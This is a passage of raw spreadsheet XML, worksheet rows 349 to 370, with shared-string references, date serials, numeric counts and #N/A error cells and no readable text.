        <v>157</v>
      </c>
      <c r="K349" s="1" t="s">
        <v>26</v>
      </c>
      <c r="L349" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M349" s="1" t="s">
        <v>475</v>
      </c>
      <c r="N349" s="1" t="s">
        <v>476</v>
      </c>
      <c r="O349" s="1"/>
      <c r="P349" s="1"/>
      <c r="Q349" s="1" t="s">
        <v>1325</v>
      </c>
      <c r="R349" s="83">
        <v>1</v>
      </c>
      <c r="S349" s="83">
        <v>14</v>
      </c>
      <c r="T349" s="83">
        <v>17</v>
      </c>
      <c r="U349" s="83">
        <v>9</v>
      </c>
      <c r="V349" s="83">
        <v>17</v>
      </c>
      <c r="W349" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="350" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A350" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B350" s="51">
        <v>44629.696740104169</v>
      </c>
      <c r="C350" s="1" t="s">
        <v>3460</v>
      </c>
      <c r="D350" s="26">
        <v>201</v>
      </c>
      <c r="E350" s="1" t="s">
        <v>3468</v>
      </c>
      <c r="F350" s="26">
        <v>201</v>
      </c>
      <c r="G350" s="1" t="s">
        <v>3469</v>
      </c>
      <c r="H350" s="1" t="s">
        <v>3470</v>
      </c>
      <c r="I350" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J350" s="1" t="s">
        <v>157</v>
      </c>
      <c r="K350" s="1" t="s">
        <v>26</v>
      </c>
      <c r="L350" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M350" s="1" t="s">
        <v>475</v>
      </c>
      <c r="N350" s="1" t="s">
        <v>476</v>
      </c>
      <c r="O350" s="1"/>
      <c r="P350" s="1"/>
      <c r="Q350" s="1" t="s">
        <v>161</v>
      </c>
      <c r="R350" s="83">
        <v>1</v>
      </c>
      <c r="S350" s="83">
        <v>14</v>
      </c>
      <c r="T350" s="83">
        <v>17</v>
      </c>
      <c r="U350" s="83">
        <v>9</v>
      </c>
      <c r="V350" s="83">
        <v>17</v>
      </c>
      <c r="W350" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="351" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A351" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B351" s="51">
        <v>44519.444953773149</v>
      </c>
      <c r="C351" s="1" t="s">
        <v>3460</v>
      </c>
      <c r="D351" s="26">
        <v>200</v>
      </c>
      <c r="E351" s="1" t="s">
        <v>3471</v>
      </c>
      <c r="F351" s="26">
        <v>200</v>
      </c>
      <c r="G351" s="1" t="s">
        <v>3472</v>
      </c>
      <c r="H351" s="1" t="s">
        <v>3473</v>
      </c>
      <c r="I351" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J351" s="1" t="s">
        <v>157</v>
      </c>
      <c r="K351" s="1" t="s">
        <v>26</v>
      </c>
      <c r="L351" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M351" s="1" t="s">
        <v>475</v>
      </c>
      <c r="N351" s="1" t="s">
        <v>476</v>
      </c>
      <c r="O351" s="1"/>
      <c r="P351" s="1"/>
      <c r="Q351" s="1" t="s">
        <v>1325</v>
      </c>
      <c r="R351" s="83">
        <v>1</v>
      </c>
      <c r="S351" s="83">
        <v>64</v>
      </c>
      <c r="T351" s="83">
        <v>204</v>
      </c>
      <c r="U351" s="83">
        <v>130</v>
      </c>
      <c r="V351" s="83">
        <v>137</v>
      </c>
      <c r="W351" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="352" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A352" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B352" s="51">
        <v>44629.696740115738</v>
      </c>
      <c r="C352" s="1" t="s">
        <v>3460</v>
      </c>
      <c r="D352" s="26">
        <v>201</v>
      </c>
      <c r="E352" s="1" t="s">
        <v>3471</v>
      </c>
      <c r="F352" s="26">
        <v>201</v>
      </c>
      <c r="G352" s="1" t="s">
        <v>3472</v>
      </c>
      <c r="H352" s="1" t="s">
        <v>3473</v>
      </c>
      <c r="I352" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J352" s="1" t="s">
        <v>157</v>
      </c>
      <c r="K352" s="1" t="s">
        <v>26</v>
      </c>
      <c r="L352" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M352" s="1" t="s">
        <v>475</v>
      </c>
      <c r="N352" s="1" t="s">
        <v>476</v>
      </c>
      <c r="O352" s="1"/>
      <c r="P352" s="1"/>
      <c r="Q352" s="1" t="s">
        <v>161</v>
      </c>
      <c r="R352" s="83">
        <v>1</v>
      </c>
      <c r="S352" s="83">
        <v>64</v>
      </c>
      <c r="T352" s="83">
        <v>204</v>
      </c>
      <c r="U352" s="83">
        <v>130</v>
      </c>
      <c r="V352" s="83">
        <v>137</v>
      </c>
      <c r="W352" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="353" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A353" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B353" s="51">
        <v>44767.632345694445</v>
      </c>
      <c r="C353" s="1" t="s">
        <v>286</v>
      </c>
      <c r="D353" s="26">
        <v>111</v>
      </c>
      <c r="E353" s="1" t="s">
        <v>287</v>
      </c>
      <c r="F353" s="26">
        <v>110</v>
      </c>
      <c r="G353" s="57" t="s">
        <v>288</v>
      </c>
      <c r="H353" s="1" t="s">
        <v>289</v>
      </c>
      <c r="I353" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J353" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K353" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L353" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M353" s="1" t="s">
        <v>290</v>
      </c>
      <c r="N353" s="1" t="s">
        <v>291</v>
      </c>
      <c r="O353" s="1"/>
      <c r="P353" s="1"/>
      <c r="Q353" s="1" t="s">
        <v>3618</v>
      </c>
      <c r="R353" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S353" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T353" s="83">
        <v>10</v>
      </c>
      <c r="U353" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V353" s="83">
        <v>13</v>
      </c>
      <c r="W353" s="1" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="354" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A354" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B354" s="80">
        <v>44491.753664386575</v>
      </c>
      <c r="C354" s="1" t="s">
        <v>297</v>
      </c>
      <c r="D354" s="26">
        <v>302</v>
      </c>
      <c r="E354" s="1" t="s">
        <v>298</v>
      </c>
      <c r="F354" s="26">
        <v>302</v>
      </c>
      <c r="G354" s="81" t="s">
        <v>299</v>
      </c>
      <c r="H354" s="1" t="s">
        <v>307</v>
      </c>
      <c r="I354" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J354" s="1" t="s">
        <v>226</v>
      </c>
      <c r="K354" s="17" t="s">
        <v>27</v>
      </c>
      <c r="L354" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M354" s="17" t="s">
        <v>308</v>
      </c>
      <c r="N354" s="1" t="s">
        <v>309</v>
      </c>
      <c r="O354" s="1"/>
      <c r="P354" s="1"/>
      <c r="Q354" s="1" t="s">
        <v>3619</v>
      </c>
      <c r="R354" s="83">
        <v>6173</v>
      </c>
      <c r="S354" s="83">
        <v>6520</v>
      </c>
      <c r="T354" s="83">
        <v>2679</v>
      </c>
      <c r="U354" s="83">
        <v>3226</v>
      </c>
      <c r="V354" s="83">
        <v>1719</v>
      </c>
      <c r="W354" s="1" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="355" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A355" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B355" s="51">
        <v>44684.726985428242</v>
      </c>
      <c r="C355" s="1" t="s">
        <v>311</v>
      </c>
      <c r="D355" s="26">
        <v>100</v>
      </c>
      <c r="E355" s="1" t="s">
        <v>312</v>
      </c>
      <c r="F355" s="26">
        <v>100</v>
      </c>
      <c r="G355" s="57" t="s">
        <v>313</v>
      </c>
      <c r="H355" s="1" t="s">
        <v>314</v>
      </c>
      <c r="I355" s="1" t="s">
        <v>210</v>
      </c>
      <c r="J355" s="1" t="s">
        <v>211</v>
      </c>
      <c r="K355" s="1" t="s">
        <v>11</v>
      </c>
      <c r="L355" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M355" s="1" t="s">
        <v>315</v>
      </c>
      <c r="N355" s="1" t="s">
        <v>316</v>
      </c>
      <c r="O355" s="1"/>
      <c r="P355" s="1"/>
      <c r="Q355" s="1" t="s">
        <v>3620</v>
      </c>
      <c r="R355" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S355" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T355" s="83">
        <v>144</v>
      </c>
      <c r="U355" s="83">
        <v>8</v>
      </c>
      <c r="V355" s="83">
        <v>125</v>
      </c>
      <c r="W355" s="1" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="356" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A356" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B356" s="80">
        <v>44684.726985451387</v>
      </c>
      <c r="C356" s="1" t="s">
        <v>311</v>
      </c>
      <c r="D356" s="26">
        <v>100</v>
      </c>
      <c r="E356" s="1" t="s">
        <v>318</v>
      </c>
      <c r="F356" s="26">
        <v>100</v>
      </c>
      <c r="G356" s="81" t="s">
        <v>319</v>
      </c>
      <c r="H356" s="1" t="s">
        <v>320</v>
      </c>
      <c r="I356" s="1" t="s">
        <v>210</v>
      </c>
      <c r="J356" s="1" t="s">
        <v>211</v>
      </c>
      <c r="K356" s="17" t="s">
        <v>11</v>
      </c>
      <c r="L356" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M356" s="17" t="s">
        <v>315</v>
      </c>
      <c r="N356" s="1" t="s">
        <v>316</v>
      </c>
      <c r="O356" s="1"/>
      <c r="P356" s="1"/>
      <c r="Q356" s="1" t="s">
        <v>3620</v>
      </c>
      <c r="R356" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S356" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T356" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U356" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V356" s="83">
        <v>18</v>
      </c>
      <c r="W356" s="1" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="357" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A357" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B357" s="51">
        <v>44684.726985439818</v>
      </c>
      <c r="C357" s="1" t="s">
        <v>311</v>
      </c>
      <c r="D357" s="26">
        <v>100</v>
      </c>
      <c r="E357" s="1" t="s">
        <v>321</v>
      </c>
      <c r="F357" s="26">
        <v>100</v>
      </c>
      <c r="G357" s="57" t="s">
        <v>322</v>
      </c>
      <c r="H357" s="1" t="s">
        <v>323</v>
      </c>
      <c r="I357" s="1" t="s">
        <v>210</v>
      </c>
      <c r="J357" s="1" t="s">
        <v>211</v>
      </c>
      <c r="K357" s="1" t="s">
        <v>11</v>
      </c>
      <c r="L357" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M357" s="1" t="s">
        <v>315</v>
      </c>
      <c r="N357" s="1" t="s">
        <v>316</v>
      </c>
      <c r="O357" s="1"/>
      <c r="P357" s="1"/>
      <c r="Q357" s="1" t="s">
        <v>3620</v>
      </c>
      <c r="R357" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S357" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T357" s="83">
        <v>2</v>
      </c>
      <c r="U357" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V357" s="83">
        <v>35</v>
      </c>
      <c r="W357" s="1" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="358" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A358" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B358" s="80">
        <v>44684.726985462963</v>
      </c>
      <c r="C358" s="1" t="s">
        <v>311</v>
      </c>
      <c r="D358" s="26">
        <v>100</v>
      </c>
      <c r="E358" s="1" t="s">
        <v>324</v>
      </c>
      <c r="F358" s="26">
        <v>100</v>
      </c>
      <c r="G358" s="81" t="s">
        <v>325</v>
      </c>
      <c r="H358" s="1" t="s">
        <v>326</v>
      </c>
      <c r="I358" s="1" t="s">
        <v>210</v>
      </c>
      <c r="J358" s="1" t="s">
        <v>211</v>
      </c>
      <c r="K358" s="17" t="s">
        <v>11</v>
      </c>
      <c r="L358" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M358" s="17" t="s">
        <v>315</v>
      </c>
      <c r="N358" s="1" t="s">
        <v>316</v>
      </c>
      <c r="O358" s="1"/>
      <c r="P358" s="1"/>
      <c r="Q358" s="1" t="s">
        <v>3620</v>
      </c>
      <c r="R358" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S358" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T358" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U358" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V358" s="83">
        <v>25</v>
      </c>
      <c r="W358" s="1" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="359" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A359" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B359" s="51">
        <v>44684.726985474539</v>
      </c>
      <c r="C359" s="1" t="s">
        <v>311</v>
      </c>
      <c r="D359" s="26">
        <v>100</v>
      </c>
      <c r="E359" s="1" t="s">
        <v>327</v>
      </c>
      <c r="F359" s="26">
        <v>100</v>
      </c>
      <c r="G359" s="57" t="s">
        <v>328</v>
      </c>
      <c r="H359" s="1" t="s">
        <v>329</v>
      </c>
      <c r="I359" s="1" t="s">
        <v>210</v>
      </c>
      <c r="J359" s="1" t="s">
        <v>211</v>
      </c>
      <c r="K359" s="1" t="s">
        <v>11</v>
      </c>
      <c r="L359" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M359" s="1" t="s">
        <v>315</v>
      </c>
      <c r="N359" s="1" t="s">
        <v>316</v>
      </c>
      <c r="O359" s="1"/>
      <c r="P359" s="1"/>
      <c r="Q359" s="1" t="s">
        <v>3620</v>
      </c>
      <c r="R359" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S359" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T359" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U359" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V359" s="83">
        <v>8</v>
      </c>
      <c r="W359" s="1" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="360" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A360" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B360" s="80">
        <v>44684.726985497684</v>
      </c>
      <c r="C360" s="1" t="s">
        <v>311</v>
      </c>
      <c r="D360" s="26">
        <v>100</v>
      </c>
      <c r="E360" s="1" t="s">
        <v>330</v>
      </c>
      <c r="F360" s="26">
        <v>100</v>
      </c>
      <c r="G360" s="81" t="s">
        <v>331</v>
      </c>
      <c r="H360" s="1" t="s">
        <v>332</v>
      </c>
      <c r="I360" s="1" t="s">
        <v>210</v>
      </c>
      <c r="J360" s="1" t="s">
        <v>211</v>
      </c>
      <c r="K360" s="17" t="s">
        <v>11</v>
      </c>
      <c r="L360" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M360" s="17" t="s">
        <v>315</v>
      </c>
      <c r="N360" s="1" t="s">
        <v>316</v>
      </c>
      <c r="O360" s="1"/>
      <c r="P360" s="1"/>
      <c r="Q360" s="1" t="s">
        <v>3620</v>
      </c>
      <c r="R360" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S360" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T360" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U360" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V360" s="83">
        <v>2</v>
      </c>
      <c r="W360" s="1" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="361" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A361" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B361" s="51">
        <v>44134.718092777781</v>
      </c>
      <c r="C361" s="1" t="s">
        <v>571</v>
      </c>
      <c r="D361" s="26">
        <v>300</v>
      </c>
      <c r="E361" s="1" t="s">
        <v>572</v>
      </c>
      <c r="F361" s="26">
        <v>300</v>
      </c>
      <c r="G361" s="57" t="s">
        <v>573</v>
      </c>
      <c r="H361" s="1" t="s">
        <v>574</v>
      </c>
      <c r="I361" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J361" s="1" t="s">
        <v>454</v>
      </c>
      <c r="K361" s="1" t="s">
        <v>575</v>
      </c>
      <c r="L361" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M361" s="1"/>
      <c r="N361" s="1"/>
      <c r="O361" s="1" t="s">
        <v>576</v>
      </c>
      <c r="P361" s="1" t="s">
        <v>577</v>
      </c>
      <c r="Q361" s="1" t="s">
        <v>3621</v>
      </c>
      <c r="R361" s="83">
        <v>15211</v>
      </c>
      <c r="S361" s="83">
        <v>13997</v>
      </c>
      <c r="T361" s="83">
        <v>12962</v>
      </c>
      <c r="U361" s="83">
        <v>13394</v>
      </c>
      <c r="V361" s="83">
        <v>14329</v>
      </c>
      <c r="W361" s="1" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="362" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A362" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B362" s="80">
        <v>44134.718092754629</v>
      </c>
      <c r="C362" s="1" t="s">
        <v>571</v>
      </c>
      <c r="D362" s="26">
        <v>300</v>
      </c>
      <c r="E362" s="1" t="s">
        <v>579</v>
      </c>
      <c r="F362" s="26">
        <v>200</v>
      </c>
      <c r="G362" s="81" t="s">
        <v>580</v>
      </c>
      <c r="H362" s="1" t="s">
        <v>581</v>
      </c>
      <c r="I362" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J362" s="1" t="s">
        <v>454</v>
      </c>
      <c r="K362" s="17" t="s">
        <v>575</v>
      </c>
      <c r="L362" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M362" s="17"/>
      <c r="N362" s="1"/>
      <c r="O362" s="1" t="s">
        <v>582</v>
      </c>
      <c r="P362" s="1" t="s">
        <v>577</v>
      </c>
      <c r="Q362" s="1" t="s">
        <v>3621</v>
      </c>
      <c r="R362" s="83">
        <v>2</v>
      </c>
      <c r="S362" s="83">
        <v>1589</v>
      </c>
      <c r="T362" s="83">
        <v>80523</v>
      </c>
      <c r="U362" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V362" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W362" s="1" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="363" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A363" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B363" s="51">
        <v>44134.71809278935</v>
      </c>
      <c r="C363" s="1" t="s">
        <v>571</v>
      </c>
      <c r="D363" s="26">
        <v>300</v>
      </c>
      <c r="E363" s="1" t="s">
        <v>583</v>
      </c>
      <c r="F363" s="26">
        <v>200</v>
      </c>
      <c r="G363" s="57" t="s">
        <v>584</v>
      </c>
      <c r="H363" s="1" t="s">
        <v>585</v>
      </c>
      <c r="I363" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J363" s="1" t="s">
        <v>454</v>
      </c>
      <c r="K363" s="1" t="s">
        <v>575</v>
      </c>
      <c r="L363" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M363" s="1"/>
      <c r="N363" s="1"/>
      <c r="O363" s="1" t="s">
        <v>576</v>
      </c>
      <c r="P363" s="1" t="s">
        <v>577</v>
      </c>
      <c r="Q363" s="1" t="s">
        <v>3621</v>
      </c>
      <c r="R363" s="83">
        <v>28831</v>
      </c>
      <c r="S363" s="83">
        <v>26056</v>
      </c>
      <c r="T363" s="83">
        <v>26160</v>
      </c>
      <c r="U363" s="83">
        <v>28561</v>
      </c>
      <c r="V363" s="83">
        <v>31609</v>
      </c>
      <c r="W363" s="1" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="364" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A364" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B364" s="80">
        <v>44134.718092743053</v>
      </c>
      <c r="C364" s="1" t="s">
        <v>571</v>
      </c>
      <c r="D364" s="26">
        <v>300</v>
      </c>
      <c r="E364" s="1" t="s">
        <v>586</v>
      </c>
      <c r="F364" s="26">
        <v>200</v>
      </c>
      <c r="G364" s="81" t="s">
        <v>587</v>
      </c>
      <c r="H364" s="1" t="s">
        <v>588</v>
      </c>
      <c r="I364" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J364" s="1" t="s">
        <v>454</v>
      </c>
      <c r="K364" s="17" t="s">
        <v>575</v>
      </c>
      <c r="L364" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M364" s="17"/>
      <c r="N364" s="1"/>
      <c r="O364" s="1" t="s">
        <v>582</v>
      </c>
      <c r="P364" s="1" t="s">
        <v>577</v>
      </c>
      <c r="Q364" s="1" t="s">
        <v>3621</v>
      </c>
      <c r="R364" s="83">
        <v>3485738</v>
      </c>
      <c r="S364" s="83">
        <v>3255172</v>
      </c>
      <c r="T364" s="83">
        <v>3390772</v>
      </c>
      <c r="U364" s="83">
        <v>3152973</v>
      </c>
      <c r="V364" s="83">
        <v>3622791</v>
      </c>
      <c r="W364" s="1" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="365" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A365" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B365" s="51">
        <v>44134.718092800926</v>
      </c>
      <c r="C365" s="1" t="s">
        <v>571</v>
      </c>
      <c r="D365" s="26">
        <v>300</v>
      </c>
      <c r="E365" s="1" t="s">
        <v>589</v>
      </c>
      <c r="F365" s="26">
        <v>200</v>
      </c>
      <c r="G365" s="57" t="s">
        <v>590</v>
      </c>
      <c r="H365" s="1" t="s">
        <v>591</v>
      </c>
      <c r="I365" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J365" s="1" t="s">
        <v>454</v>
      </c>
      <c r="K365" s="1" t="s">
        <v>575</v>
      </c>
      <c r="L365" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M365" s="1"/>
      <c r="N365" s="1"/>
      <c r="O365" s="1" t="s">
        <v>576</v>
      </c>
      <c r="P365" s="1" t="s">
        <v>577</v>
      </c>
      <c r="Q365" s="1" t="s">
        <v>3621</v>
      </c>
      <c r="R365" s="83">
        <v>309850</v>
      </c>
      <c r="S365" s="83">
        <v>299634</v>
      </c>
      <c r="T365" s="83">
        <v>290293</v>
      </c>
      <c r="U365" s="83">
        <v>303099</v>
      </c>
      <c r="V365" s="83">
        <v>356297</v>
      </c>
      <c r="W365" s="1" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="366" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A366" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B366" s="80">
        <v>44134.718092766205</v>
      </c>
      <c r="C366" s="1" t="s">
        <v>571</v>
      </c>
      <c r="D366" s="26">
        <v>300</v>
      </c>
      <c r="E366" s="1" t="s">
        <v>592</v>
      </c>
      <c r="F366" s="26">
        <v>300</v>
      </c>
      <c r="G366" s="81" t="s">
        <v>593</v>
      </c>
      <c r="H366" s="1" t="s">
        <v>594</v>
      </c>
      <c r="I366" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J366" s="1" t="s">
        <v>454</v>
      </c>
      <c r="K366" s="17" t="s">
        <v>575</v>
      </c>
      <c r="L366" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M366" s="17"/>
      <c r="N366" s="1"/>
      <c r="O366" s="1" t="s">
        <v>582</v>
      </c>
      <c r="P366" s="1" t="s">
        <v>577</v>
      </c>
      <c r="Q366" s="1" t="s">
        <v>3621</v>
      </c>
      <c r="R366" s="83">
        <v>524133</v>
      </c>
      <c r="S366" s="83">
        <v>500477</v>
      </c>
      <c r="T366" s="83">
        <v>500874</v>
      </c>
      <c r="U366" s="83">
        <v>500728</v>
      </c>
      <c r="V366" s="83">
        <v>602091</v>
      </c>
      <c r="W366" s="1" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="367" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A367" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B367" s="51">
        <v>44134.718092812502</v>
      </c>
      <c r="C367" s="1" t="s">
        <v>571</v>
      </c>
      <c r="D367" s="26">
        <v>300</v>
      </c>
      <c r="E367" s="1" t="s">
        <v>595</v>
      </c>
      <c r="F367" s="26">
        <v>200</v>
      </c>
      <c r="G367" s="57" t="s">
        <v>596</v>
      </c>
      <c r="H367" s="1" t="s">
        <v>597</v>
      </c>
      <c r="I367" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J367" s="1" t="s">
        <v>454</v>
      </c>
      <c r="K367" s="1" t="s">
        <v>575</v>
      </c>
      <c r="L367" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M367" s="1"/>
      <c r="N367" s="1"/>
      <c r="O367" s="1" t="s">
        <v>582</v>
      </c>
      <c r="P367" s="1" t="s">
        <v>577</v>
      </c>
      <c r="Q367" s="1" t="s">
        <v>3621</v>
      </c>
      <c r="R367" s="83">
        <v>151906</v>
      </c>
      <c r="S367" s="83">
        <v>147659</v>
      </c>
      <c r="T367" s="83">
        <v>150650</v>
      </c>
      <c r="U367" s="83">
        <v>154765</v>
      </c>
      <c r="V367" s="83">
        <v>180140</v>
      </c>
      <c r="W367" s="1" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="368" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A368" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B368" s="80">
        <v>44037.962066990738</v>
      </c>
      <c r="C368" s="1" t="s">
        <v>1286</v>
      </c>
      <c r="D368" s="26">
        <v>100</v>
      </c>
      <c r="E368" s="1" t="s">
        <v>1287</v>
      </c>
      <c r="F368" s="26">
        <v>100</v>
      </c>
      <c r="G368" s="81" t="s">
        <v>1288</v>
      </c>
      <c r="H368" s="1" t="s">
        <v>1289</v>
      </c>
      <c r="I368" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J368" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K368" s="17" t="s">
        <v>10</v>
      </c>
      <c r="L368" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M368" s="17" t="s">
        <v>270</v>
      </c>
      <c r="N368" s="1" t="s">
        <v>271</v>
      </c>
      <c r="O368" s="1" t="s">
        <v>1295</v>
      </c>
      <c r="P368" s="1"/>
      <c r="Q368" s="1" t="s">
        <v>161</v>
      </c>
      <c r="R368" s="83">
        <v>94742</v>
      </c>
      <c r="S368" s="83">
        <v>103735</v>
      </c>
      <c r="T368" s="83">
        <v>96125</v>
      </c>
      <c r="U368" s="83">
        <v>105138</v>
      </c>
      <c r="V368" s="83">
        <v>120505</v>
      </c>
      <c r="W368" s="1" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="369" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A369" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B369" s="51">
        <v>44532.364457488424</v>
      </c>
      <c r="C369" s="1" t="s">
        <v>1408</v>
      </c>
      <c r="D369" s="26">
        <v>203</v>
      </c>
      <c r="E369" s="1" t="s">
        <v>1409</v>
      </c>
      <c r="F369" s="26">
        <v>103</v>
      </c>
      <c r="G369" s="57" t="s">
        <v>1410</v>
      </c>
      <c r="H369" s="1" t="s">
        <v>1411</v>
      </c>
      <c r="I369" s="1" t="s">
        <v>17</v>
      </c>
      <c r="J369" s="1" t="s">
        <v>1412</v>
      </c>
      <c r="K369" s="1" t="s">
        <v>17</v>
      </c>
      <c r="L369" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M369" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N369" s="1"/>
      <c r="O369" s="1"/>
      <c r="P369" s="1"/>
      <c r="Q369" s="1" t="s">
        <v>1413</v>
      </c>
      <c r="R369" s="83">
        <v>5709</v>
      </c>
      <c r="S369" s="83">
        <v>4176</v>
      </c>
      <c r="T369" s="83">
        <v>2291</v>
      </c>
      <c r="U369" s="83">
        <v>813</v>
      </c>
      <c r="V369" s="83">
        <v>913</v>
      </c>
      <c r="W369" s="1" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="370" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A370" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B370" s="80">
        <v>44473.725267557871</v>
      </c>
      <c r="C370" s="1" t="s">
        <v>1408</v>
      </c>
      <c r="D370" s="26">
        <v>203</v>
      </c>
      <c r="E370" s="1" t="s">
        <v>1414</v>
      </c>
      <c r="F370" s="26">
        <v>101</v>
      </c>
      <c r="G370" s="81" t="s">
        <v>1415</v>
      </c>
      <c r="H370" s="1" t="s">
        <v>1416</v>
      </c>
      <c r="I370" s="1" t="s">
        <v>17</v>
      </c>
      <c r="J370" s="1" t="s">
        <v>1412</v>
      </c>
      <c r="K370" s="17" t="s">
        <v>17</v>
      </c>
      <c r="L370" s="17" t="s">
        <v>83</v>
      </c>
      <c r="M370" s="17" t="s">
        <v>72</v>
      </c>
      <c r="N370" s="1"/>
      <c r="O370" s="1"/>
      <c r="P370" s="1"/>
      <c r="Q370" s="1" t="s">
        <v>1413</v>
      </c>
      <c r="R370" s="83">
        <v>2158</v>
